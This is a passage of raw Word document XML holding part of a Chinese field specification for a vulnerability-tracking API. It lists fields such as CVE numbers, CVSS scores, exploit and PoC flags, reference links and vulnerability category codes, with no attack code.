          <w:p w14:paraId="7E5CBA64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46679D37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10072FCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否存在exp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0612B5BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C5915E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30A99855" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7545B9E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EF91E79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否内核漏洞（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="546F21E0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D2ECD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>localEscalation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D43A56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCECD5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34A90D47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否本地提权（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21E61C0D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46737A59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5729785B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CFB1498" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77520DBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否远程执行（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A2A9343" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13CED31A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hasPoc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00853EA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12C1349C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="190BF109" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>存在</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="099F1B87" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E60613F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cvssScore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="627F7F55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5044CABA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A221C28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07C99E0D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37EFBA39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02C7EEAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B1C581C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196D0E48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6509CDD8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC10D8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>refs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75318FDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="096939F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mediumblob</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E0F453" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>引用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F99B24B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442AD26D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>expRefs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39D77C36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC4EA94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F67E3C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参考链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A61DA61" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6659A3C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocRefs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17ED4D3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05B8A9E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="185AB1C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>参考链接（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="30563E68" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4703ADF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cves</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73354700" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DF1B147" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2AC863" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>CVE编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EECC136" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77A4D759" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E65AAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6531AE09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DEE6D88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">漏洞类型:0 SQL注入,1 未授权访问,2 敏感信息泄露,3 XML外部实体注入,4 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>跨站脚本</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">攻击,5 不安全的反序列,6 客户端请求伪造,7 服务端请求伪造,8 命令执行,9 代码执行,10 任意文件上传,11 任意文件读取,12 拒绝服务攻击,13 目录遍历,14 恶意后门,15 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>本地提权</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,16 注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36D66C19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBD2768" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="029DA51D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D40553" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinytext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04DD3F6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>利用条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35561265" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AFDC376" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5440718A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475095A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7989C4F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>受影响应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FD6DFD3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="420C7E70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocCheckResults</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="745B6F0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72BFE976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="476C466F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POC检测结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="115570C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回部分说明：</w:t>
      </w:r>
      <w:r>
        <w:t>rows中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocCheckResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1409"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CB4710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5D454F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCB6271" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E8C4811" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B584CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22ADAB02" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2161218A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeType</w:t>
            </w:r>
